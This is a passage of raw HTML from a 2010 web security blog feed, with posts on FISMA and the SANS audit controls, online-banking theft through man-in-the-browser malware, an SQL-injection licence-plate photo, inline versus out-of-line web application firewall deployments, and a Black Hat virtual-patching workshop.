medium;"> as created by the Center for Strategic and International Studies (members of the Consortium include NSA, US Cert, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="Apple-style-span" style="font-size: medium;">DoD</span></span><span class="Apple-style-span" style="font-size: medium;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_12"><span class="Apple-style-span" style="font-size: medium;">JTF</span></span><span class="Apple-style-span" style="font-size: medium;">-</span><span class="blsp-spelling-error" id="SPELLING_ERROR_13"><span class="Apple-style-span" style="font-size: medium;">GNO</span></span><span class="Apple-style-span" style="font-size: medium;">, the Department of Energy Nuclear Laboratories, Department of State, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_14"><span class="Apple-style-span" style="font-size: medium;">DoD</span></span><span class="Apple-style-span" style="font-size: medium;"> </span><span class="blsp-spelling-error" id="SPELLING_ERROR_15"><span class="Apple-style-span" style="font-size: medium;">Cyber</span></span><span class="Apple-style-span" style="font-size: medium;"> Crime Center plus the top commercial forensics experts and pen testers that serve the banking and critical infrastructure communities). Mr. </span><span class="blsp-spelling-error" id="SPELLING_ERROR_16"><span class="Apple-style-span" style="font-size: medium;">Paller</span></span><span class="Apple-style-span" style="font-size: medium;"> stated in his testimony:</span></div><div></div><blockquote><div><i><span class="Apple-style-span" style="font-size: medium;">Both the guidance for implementing </span><span class="blsp-spelling-error" id="SPELLING_ERROR_17"><span class="Apple-style-span" style="font-size: medium;">FISMA</span></span><span class="Apple-style-span" style="font-size: medium;"> and the guidance for auditing </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">compliance are focusing on out of date, ineffective defenses. What we need instead </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">is a process that directs agencies to focus their </span><span class="blsp-spelling-error" id="SPELLING_ERROR_18"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span><span class="Apple-style-span" style="font-size: medium;"> security resources on </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">monitoring their information systems and networks in real time so that they can </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">prevent, detect and/or mitigate damage from attacks as they occur. And oversight </span><span class="Apple-style-span" style="font-style: normal; "><i><span class="Apple-style-span" style="font-size: medium;">must be focused on the effectiveness of the agencies’ real‐time defenses.</span></i></span></i></span></i></span></i></span></i></span></i></div></blockquote><div></div><div><span class="Apple-style-span" style="font-size: medium;">The </span><span class="blsp-spelling-error" id="SPELLING_ERROR_19"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span><span class="Apple-style-span" style="font-size: medium;"> list is much more update-to-date not only with current attack methodologies of advanced persistent threats (APT) but also includes critical audit components such as what metrics should be captured and how to test the effectiveness of the controls. One example taken from the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_20"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span><span class="Apple-style-span" style="font-size: medium;"> is </span><a href="http://www.sans.org/critical-security-controls/control.php?id=7"><span class="Apple-style-span" style="font-size: medium;">Control 7: Application Software Security</span></a><span class="Apple-style-span" style="font-size: medium;"> which lists specific, operational controls for web applications such as:</span></div><div><span class="Apple-style-span" style=" line-height: 17px; font-family:'trebuchet ms', verdana, sans-serif;"><blockquote><h4 style="padding-top: 15px; padding-right: 2px; padding-bottom: 4px; padding-left: 2px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; color: rgb(0, 87, 125); font-family: 'trebuchet ms', sans-serif; "><i><span class="Apple-style-span" style="font-size: medium;">How can this control be implemented, automated, and its effectiveness measured?</span></i></h4><ol style="list-style-image: none; "><li style="padding-top: 2px; padding-right: 2px; padding-bottom: 2px; padding-left: 2px; "><i><span class="blsp-spelling-error" id="SPELLING_ERROR_21"><span class="Apple-style-span" style="font-size: medium;">QW</span></span><span class="Apple-style-span" style="font-size: medium;">: Organizations should protect web applications by deploying web application firewalls that inspect all traffic flowing to the web application for common web application attacks, including but not limited to Cross-Site Scripting, </span><span class="blsp-spelling-error" id="SPELLING_ERROR_22"><span class="Apple-style-span" style="font-size: medium;">SQL</span></span><span class="Apple-style-span" style="font-size: medium;"> injection, command injection, and directory traversal attacks. For applications that are not web based, deploy specific application firewalls if such tools are available for the given application type.</span></i></li></ol></blockquote></span></div><div></div></span></div><blockquote><div><span class="Apple-style-span" style="font-family:arial;"><div><i><span class="Apple-style-span" style="font-size: medium;"><br /></span></i></div></span></div></blockquote><span class="Apple-style-span" style="font-family:arial;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.whitehatsec.com/home/resource/whitepapers/graphics/WAF_averagetimetofix.png"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 422px; height: 217px;" src="http://www.whitehatsec.com/home/resource/whitepapers/graphics/WAF_averagetimetofix.png" border="0" alt="" /></a><span class="Apple-style-span" style="font-size: medium;"><br /><br />Again, web application firewalls can be used as a tactical remediation tool to help organizations reduce their time-to-fix metric of fixing identified vulnerabilities by acting as a virtual patch (or compensating control as specified in control 7 of the </span><span class="blsp-spelling-error" id="SPELLING_ERROR_23"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span><span class="Apple-style-span" style="font-size: medium;">). The graphic on the right is taken from </span><a href="http://www.whitehatsec.com/home/resource/stats.html"><span class="Apple-style-span" style="font-size: medium;">Whitehat Security's Statistics Report</span></a><span class="Apple-style-span" style="font-size: medium;"> and it tracks the average time to fix a class of vulnerability measured in days. As you can see, most of these issues aren't resolved for months. The CAG, on the other hand, recommends the following remediation times:</span></span><div><span class="Apple-style-span" style=" line-height: 17px; "><i><blockquote><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Additionally, all high-risk vulnerabilities in Internet-accessible web applications identified by web application vulnerability scanners, static analysis tools, and automated database configuration review tools must be mitigated (by either fixing the flaw or through implementing a compensating control) </span><b><span class="Apple-style-span" style="font-size: medium;">within fifteen days</span></b><span class="Apple-style-span" style="font-size: medium;"> of discovery of the flaw.</span></span></blockquote></i></span></div><div><span class="blsp-spelling-error" id="SPELLING_ERROR_24"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">WAFs</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> can help to close the gap of remediation time between what is recommended by </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_25"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">CAG</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> and the time that it normally takes an organization to implement source code level changes in production. This type of continuous monitoring and agile response capabilities are a key component of defense and it is good news that the government is looking to ensure </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_26"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">FISMA</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> includes them.</span></span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-69841137655805396072010-03-23T09:44:00.006-04:002010-03-30T10:37:01.689-04:00Hackers Targetting Commercial Online Bank Accounts<a href="http://2.bp.blogspot.com/_E0YEPhKPc2k/S6jGgfz2A7I/AAAAAAAAAGI/H5C4lailchk/s1600-h/bank_robbery.gif"><img id="BLOGGER_PHOTO_ID_5451825610529047474" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 300px; CURSOR: hand; HEIGHT: 300px" alt="" src="http://2.bp.blogspot.com/_E0YEPhKPc2k/S6jGgfz2A7I/AAAAAAAAAGI/H5C4lailchk/s400/bank_robbery.gif" border="0" /></a> <em>Submitted by Ryan Barnett 3/23/2010</em><br /><div></div><br /><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">There have been a number of stories in the past few months that outline a growing trend with </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_0"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">-criminals - targeting the online banking accounts of businesses. As the cartoon on the right shows, stealing money from online banks is an optimal choice for savvy </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_1"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">-criminals as the </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_2"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">yield</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> is potentially very high and the risk of physical harm associated with attempting to rob a brick-and-mortar bank is removed. </span></span></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><i> </i></span></span></div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Two such stories come from </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_3"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">ComputerWorld</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> and outline how two companies had money </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_4"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">transferred</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> out of their accounts to foreign countries. The first one tells how </span></span><a href="http://www.computerworld.com/s/article/9153598/Poughkeepsie_N.Y._slams_bank_for_378_000_online_theft"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">the TD Bank account of the town of </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_5"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Poughkeepsie</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">, NY </span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">was breached by hackers and approximately $378,000 was transfer out of the account. The other example describes how </span></span><a href="http://www.computerworld.com/s/article/9149218/Bank_sues_victim_of_800_000_cybertheft"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Plano, TX Hillary Machinery Inc had approximately $800,000 </span></span><span class="blsp-spelling-corrected" id="SPELLING_ERROR_6"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">transferred</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> from its </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_7"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">PlainsCapital</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> online account</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">.</span></span></div><div> </div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">So, how were the </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_8"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">cyber</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">-criminals able to obtain access to these online bank accounts? Details are scarce however it appears that the criminals used valid credentials. A likely source would be a Man-in-the-browser (</span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_9"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">MitB</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">) type of attack from something like </span></span><a href="http://blog.threatexpert.com/2009/09/time-to-revisit-zeus-almighty.html"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Zeus</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> which infects client computers and monitors web activity and can steal and even manipulate web data. Brian Krebs from the Washington Post has been following these trending stories for about 9 months now and this </span></span><a href="http://www.krebsonsecurity.com/2010/03/ebanking-victim-take-a-number/#more-1522"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">blog post seems to corroborate the attack method</span></span></a><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"> of MitB types of malware stealing banking credentials.</span></span></div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">From a web application defense perspective, since the attackers used legit credentials during the transactions, other types of fraud/anomaly detection mechanisms should be employed. In both example incidents, the fact that these transactions were initiated from computers in other countries (</span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_10"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Itally</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">/Romania) and transferring money to over-seas accounts should have raised some sort of red-flags.</span></span></div><div> </div><div><em><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;"><br /></span></span></em></div><div><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">Bottom line - user must take extra precautions when accessing online banking accounts such as not using your standard web browser that you use for web surfing and instead using a sand-boxed web browser sessions (in an application such as </span></span><span class="blsp-spelling-error" id="SPELLING_ERROR_11"><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">VMware</span></span></span><span class="Apple-style-span" style="font-family:arial;"><span class="Apple-style-span" style="font-size: medium;">).</span></span></div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-38177732544782172662010-03-22T15:07:00.007-04:002010-03-22T16:48:37.838-04:00Applications vs. Automobiles<a href="http://4.bp.blogspot.com/_E0YEPhKPc2k/S6fB8CGapUI/AAAAAAAAAGA/uKZ0UPCeQqU/s1600-h/SQL_Injection_Plate.jpg"><img id="BLOGGER_PHOTO_ID_5451539111055369538" style="FLOAT: right; MARGIN: 0px 0px 10px 10px; WIDTH: 400px; CURSOR: hand; HEIGHT: 296px" alt="" src="http://4.bp.blogspot.com/_E0YEPhKPc2k/S6fB8CGapUI/AAAAAAAAAGA/uKZ0UPCeQqU/s400/SQL_Injection_Plate.jpg" border="0" /></a> <div><em>Submitted by Ryan Barnett 03/22/2010</em></div><div></div><br /><div>I funny picture was sent to me through our PR team at <a href="http://www.schwartz-pr.com/">Schwartz Communications</a> that made me chuckle. I am sure you have seen <a href="http://auto.howstuffworks.com/car-driving-safety/safety-regulatory-devices/red-light-camera.htm">traffic light cameras that automatically take photos of the cars that do not obey traffic lights</a>. Well, this photo shows how someone was attempting to abuse the fact that most of these cameras are integrated with computers and presumably back-end databases to automatically generate traffic violation tickets. By placing an SQL query on the front bumper where the license plate would normally reside, the driver of this car may be able to not only evade receiving a ticket but may also delete the entire "tablice" table. </div><div></div><div> </div><div>This scenario clearly indicates a growing trend - <strong><em>the inter-connectedness between applications and automobiles.</em></strong></div><div></div><div> </div><div>Another recent news story that echoes this trend is found in a recent <a href="http://projects.webappsec.org/Web-Hacking-Incident-Database"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">WASC</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_1">WHID</span></a> <a href="http://wasc-whid.dabbledb.com/page/wasc-whid/dXhcaNXd?embed=false&filter33485=&filter33487=2010-2">entry</a> where an attacker was able to hack into his former employer's web application that communicated with systems installed on leased cars. This <span class="blsp-spelling-corrected" id="SPELLING_ERROR_2">software</span> was able to either prevent cars from starting or force the car horn to beep repeatedly if the car's lease payment went past due. The hacker not only destroyed account data but also caused 100+ cars to not start and horns sounding off.</div><div></div><div>These are fairly harmless impacts but there is an under current for concern that this inter-connectedness between online applications and our physical world is actually quite fragile and must be protected from abuse. </div>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com1tag:blogger.com,1999:blog-5361523904237597206.post-44475850168378766402010-03-16T10:07:00.012-04:002010-03-16T16:16:01.390-04:00Inline vs. Out-of-Line WAF Deployments<span style="font-style: italic;">Submitted by Ryan Barnett 03/16/2010</span><br /><br /><span style="font-family:arial;">There was an article that just came out today entitled "</span><a style="font-family: arial;" href="http://www.itweb.co.za/index.php?option=com_content&view=article&id=31317:top-considerations-for-selecting-web-application-firewall-technology&catid=86:computing&Itemid=64&tmpl=component&print=1">Top considerations for selecting Web Application Firewall technology</a><span style="font-family:arial;">" that I had to comment on. First of all, the title is misleading as a more accurate title for this would have been "</span><span style="font-style: italic; font-weight: bold;font-family:arial;" >Proxy vs. Non-Proxy based WAF deployment models</span><span style="font-family:arial;">" as the article highlights why they think that a proxy-based WAF deployment is superior to non-proxy ones. Is this really the case? It depends. Each WAF deployment is different base on the use-case. Are you going to use it for virtual patching, http audit logging, tracking sensitive data, application DoS or App Defect identification? All of these scenarios are different and they don't always require an inline, proxy-base deployment model.</span><br /><br /><span style="font-family:arial;">It is also important to note that there are hybrid deployment modes available for WAFs which include deploying sensors out-of-line to gather data and then communicating with agent applications installed on specific, individual web servers. The advantage of this approach is that for many large networks, they may only want to use an inline approach for some web applications without incurring the latency hit to other applications. </span><br /><br /><span style="font-family:arial;">Keep in mind that this article was written by Evolution PR who represents WAF vendor Barracuda Networks - </span><span style="font-weight: bold; font-style: italic;font-family:arial;" >who does not offer an out-of-line/non-proxy based WAF solution</span><span style="font-family:arial;">. This makes it a bit more clear as to why they are trying to pitch proxy-based WAF as the only real solution. Breach Security's WebDefend appliance can be deployed in both out-of-line and inline modes so I am not promoting one over the other due to commercial interests. My aim here is to provide counterpoints to the data presented in this article. Let's look at the issues highlighted in more depth.</span><br /><p style="font-weight: bold; font-family: arial;">1. Cloaking</p><blockquote style="font-style: italic; font-family: arial;"><p>Hackers gather information in order to launch an attack on a Web server by trying to simulate error conditions on a Web site. Often, the resultant error messages expose information about the Web server, application server, or the database being used. This information is then used to launch a full-scale attack on the Web infrastructure.</p><p>A proxy-based WAF intercepts the response from the back-end server and forwards it to the client only if it is not an error. If the response is an error, the WAF can suppress the response containing debugging information and send out a custom response. The WAF also removes headers such as server banners, which can be used to identify servers.</p></blockquote><span style="font-family:arial;">The WASC Web Application Firewall Evaluation Criteria (WAFEC) document lists several alternative </span><a style="font-family: arial;" href="http://webappsec.pbworks.com/f/wasc-wafec-v1.0.html#N103B9">protection techniques</a><span style="font-family:arial;"> that can be employed. In this section, the article is mainly talking about detailed error leakage prevention which isn't really what is considered web application cloaking. Cloaking involves attempting to obscure or remove tell-tale signs of the web application technology in use. These include encrypting or signing Cookies, URLs and parameter data to prevent tampering. While this is certainly a sexy concept it runs into issues in practice mainly due to the dynamic nature of today's web applications. </span><span style="font-weight: bold; font-style: italic;font-family:arial;" >Accurately parsing outbound response bodies in order to accurately identify/update/sign/encrypt all possible parameter data is not easy.</span><span style="font-family:arial;"> You can thank AJAX, Flash, etc... for that. If is for this reason, that using behavioral profiling of inbound application usage is key. </span><br /><br /><span style="font-weight: bold;font-family:arial;" >2. Input validation</span><p face="arial"></p><blockquote style="font-style: italic; font-family: arial;"><p>A WAF should secure applications where the incoming traffic may be encrypted or encoded using a non-standard character encoding.</p><p>A proxy based WAF decrypts and normalises data before running various types of checks, in order to ensure that no attacks are smuggled inside of encrypted or encoded packets. It also offers multiple ways of securing inputs - such as encrypting or digitally signing cookies to prevent against cookie tampering attacks. It can also recognise which fields are read-only or hidden and ensure that these fields are not altered. For other fields, it should offer a host of protection mechanisms such as checking for various attacks on the input fields and locking down those inputs based on data type, such as numeric or alpha numeric.</p><p>Non-proxy based WAFs do not provide effective input validation. Although some can encrypt and normalise data, because they are not proxy-based they are not able to enforce rules on individual form parameters passed to the application. They also cannot encrypt or digitally sign the application cookie; relying instead on signature matching for security.</p></blockquote><p face="arial"></p><p style="font-family: arial;">Where to start with this section... First of all, <span style="font-weight: bold; font-style: italic;">the deployment model in use (inline vs. out-of-line) has absolutely nothing to do with the WAF's input validation capabilities</span>. WAFs can do application profiling/learning and automatically create a positive security profile for URLs+Parameter payloads whether they are proxy-based or not. It is important to note, however, that there is a difference between detection and blocking. This section seems to indicate that non-proxy based WAFs can not detect these types of attacks and enforce input validation and this is not true. Once a violation of the learned profile occurs, however, if you want the WAF to block, then of course an inline WAF can block the request locally.<br /></p><p style="font-weight: bold; font-family: arial;">3. Data theft protection</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Proxy based WAFs intercept outbound data, so they can be configured to ensure that sensitive data - like credit card numbers - are either masked or altogether blocked to protect data leakage.</p><p>This is only possible because the proxy-based WAF sits in line with the application server and secures data on both incoming and outgoing paths - so this is not offered by non-proxy based WAFs.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Proxy based WAFs do have one advantage when it comes to outbound data handling and that is if the user wants to actually change data on the fly to mask or delete sensitive data and still serve the response to the client. Again, while this sound like a great concept, there are issues in the real world. One specific issue which I have seen is when a WAF sanitized data doing outbound and this caused problems with processing of subsequent requests as this data was used within hidden fields. Remember my point from item #1 above in this regard as accurate parsing of outbound data is oftentimes difficult so properly sanitizing data is challenging as well.<br /></p><p style="font-weight: bold; font-family: arial;">4. Protect against application layer DOS attacks</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>There are many ways of launching an application layer denial of service attack. Web applications maintain state information - such as the number of items in a shopping cart - with the help of sessions, which require some memory resources on the Web servers. By forcing a Web server to create thousands of session leads, memory resources are locked up and this results in performance degradation and can lead to a server crash.</p><p>There are other ways these attacks can be done. The WAF should be able to control the rate at which requests reach the Web server, and track the rate of session creation. This is only possible with a system that proxies on behalf of the Web or application server.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Again - not true. Out-of-Line WAFs are also able to do rate-limiting and identify potential DoS scenarios. Breach Security's WebDefend appliance has Excessive Access Rate Detection capabilities which allow the user to set appropriate <a href="http://projects.webappsec.org/Insufficient+Anti-automation">Anti-Automation</a> rate-limiting thresholds to prevent brute force, scraping and DoS attacks. In an earlier blog post I also outlined how a WAF can <a href="http://tacticalwebappsec.blogspot.com/2009/10/identifying-denial-of-service.html">Identify DoS Conditions through Performance Monitoring</a> which helps to identify stealthy attacks that aim to open http connections and then sit idle and tie up processes. Under all of these circumstances, the issue is not about detection but how are you going to react when these attacks are identified. WAFs can choose to issue TCP resets based on increasing granularity: IP addresses, SessionIDs, or specific application usernames. If your site is under a heavy DDoS attack, it is usually appropriate to take evasion actions and actually push out the IP blocking to a network security device at the edge of your network.</p><p style="font-weight: bold; font-family: arial;">5. Centralised security enforcement</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>The ability to enforce all security policies from a single control point allows for simplified operations and infrastructure. To ensure safer and more efficient security administration, it is advisable that controlling and enforcing attack prevention, privacy (SSL cryptography) and AAA (Authentication, Authorisation, Accounting) policy is done through a single control point.</p><p>Because a non-proxy WAF does not terminate TCP connections, it does not have the ability to request credentials from incoming users, issue cookies upon successful credential exchange, redirect sessions to particular destinations, or restrict particular users to particular resources. Proxy-based solutions, on the other hand, have the capability to be an AAA authority - or to fully integrate with existing AAA infrastructure.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">Centralization of authentication/authorization mechanism is great from a management perspective but it isn't always appropriate from a WAF perspective. Most web applications handle user authentications themselves and are managed by different business units. Forget about WAFs for a minute - it is a larger undertaking to centralize web application account administration than to try and start this because you are going to implement a WAF. Where this makes sense is if/when you are create more of a portal environment and you want to then broker requests to different internal business units.<br /></p><p style="font-weight: bold; font-family: arial;">6. Control the response</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Because of the wide range of security violations, it is important that the administrator is able to respond to threats differently. For example, in many cases it would be best to respond to a violation with a custom message or connection reset, while in others the administrator may want to follow up with the main action directly, with a longer block time.</p><p>Only proxy-based solutions are able to offer this sort of flexibility, as non-proxy based WAFs rely solely on sending TCP resets back to the attacker and temporary network ACLs as their protective mechanisms. Attacking packets will make it through to the server, and blocking actions are time-limited.</p><p></p></blockquote><p style="font-family: arial;">Don't forget about the hybrid deployment option I mentioned at the beginning which includes adding agents to specific web applications. This section does have a point, however, in that if you want to get more granular with handling custom error messages and redirecting the user under specific circumstances then having an inline WAF provides more options. As far as disruptive actions, out-of-line WAFs are not relegated to only using TCP resets. One interesting reactive action that Breach Security's WebDefend appliance has is called "Application Logout" in which the WAF initiates an http request to the application simulates the client actually logging out. This is similar in theory to doing TCP resets at lower OSI levels where you have to spoof the proper sequence numbers in order to terminate the connections. For the http layer, WebDefend will dynamically insert the proper application SessionID cookie value when submitting the app logout so it appears from the application's perspective that the logout was initiated by the user. Pretty slick. It is quite handy when used under certain policy violations such as suspected Session Hijacking events.<br /></p><p style="font-weight: bold; font-family: arial;">7. SSL architectural considerations</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Application attacks use SSL cryptography and common encoding techniques to bypass traditional security measures, and hide their attacks. Proxy and non-proxy WAFs are quite different in the way they handle SSL cryptography and key management.</p><p>Non-proxy WAF vendors claim that they also have the technology to 'see' into an SSL encrypted packet as it passes by the non-proxy device. However, because decrypting and analysing the data takes time, by the time the non-proxy WAF is ready to make a decision, the attack will have already reached the back-end servers and completed the transaction.</p><p>Proxy based WAFs, on the other hand, are designed to serve as an SSL termination endpoint. Proxies tightly couple TCP, SSL and HTTP termination, giving them complete visibility into application content and allowing them to perform deep inspection on the entire session payload, including headers, URLs, parameters and form fields.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">This section brings up and interesting trade-off that all WAF users must deal with - performance/latency of inspection vs. effective blocking. Out-of-line deployments are ideal for the former while inline deployments are the best for the latter. So, which items is more important to you? The second paragraph makes it seems as though out-of-line WAFs can't do the same SSL decryption/inspection and that is false as they can provide the same level of visibility. The issue is with that of latency and if, after inspection, disruptive actions are employed.</p><p style="font-weight: bold; font-family: arial;">8. Accelerate and scale application delivery</p><p style="font-style: italic; font-family: arial;"></p><blockquote style="font-family: arial;">It is important that a WAF product does not negatively affect end-user response time. Proxy based firewalls fully terminate the TCP, SSL and HTTP, reducing end user response time. They should be able to cache static content from the application, offloading servers and saving download time; pool TCP connections to the back-end servers and offload SSL processing, thereby reducing server load and end-user response time. Non-proxy based WAF products do not offer these features.</blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">The first sentence is the key from a WAF perspective as all users want to add in the security inspection without negatively affecting end users. If you deploy an out-of-line WAF, then there will be no added performance or latency hit. If, on the other hand, you deploy an inline WAF then there is going to be a negative impact due to the SSL decryption, traffic inspection and probable SSL re-encryption on the back-end. It is for this reason that many inline WAFs have had to add on the application acceleration aspects to attempt to off-set this performance hit. So, you end up having a WAF vendor that is then trying to bolt on ADC types of functions and compete with other vendors who specialize in this space (such as an F5). On the flip side, you have ADC vendors (again like an F5) who specialize in application delivery who try and also bolt on add-on modules to provide web application firewall functionality. The main problem I see on both fronts is that they are going outside of their core competency. When deploying a WAF, it is best to do an architecture review to identify the ideal location for both inspection and blocking of traffic. This may include placing WAFs either before or after existing HTTP Load Balancers. There are benefits of both approaches. From a blocking perspective, an out-of-line WAF has a better chance of terminating a TCP connection if it is deployed directly in front of another layer 7 inspection device. On the performance front - if you can terminate SSL decryption on the load balancers, then placing the WAF behind them will make it more performant.</p>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-31793824462554459062010-03-09T11:10:00.004-05:002010-03-09T11:14:48.469-05:00WAF Virtual Patching Workshop at Blackhat USA 2010<span style="font-style: italic;">Submitted by Ryan Barnett 03/09/2010</span><br /><br /><span style="font-size:100%;"><span style="font-family:arial;">Just wanted to let everyone know that if you are headed to Blackhat USA 2010 this summer in Las Vegas, we have just added a 1-day workshop on the day before the Briefings start -</span><br /><span style="font-family:arial;"><br /><a href="http://www.blackhat.com/html/bh-us-10/training/bh-us-10-training_RB-WAFVirtPatch.html">http://www.blackhat.com/html/bh-us-10/training/bh-us-10-training_RB-WAFVirtPatch.html</a></span></span> <span style="font-size:100%;"><span style="font-family:arial;"><br /><br />In the workshop, we will be mainly discussing the "Virtual Patching" concept of using a WAF (ModSecurity in this case) and we will use the OWASP WebGoat app as the target. In the workshop, we will talk virtual patching theory and then have hands-on labs where we will show how to use Mod to virtually patch the various WebGoat lessons. As a side note - we will also have a section on the new CRS v2.0 when discussing negative security models. So, if you want to come and dive into the deep-end of the pool and have fun using some of ModSecurity's advanced features (such as Lua and Content Injection) then sign-up now!</span></span> <span style="font-size:100%;"><span style="font-family:arial;"><br /><br />Brian Rectanus and I hope to see you all in Vegas!!! :)</span></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0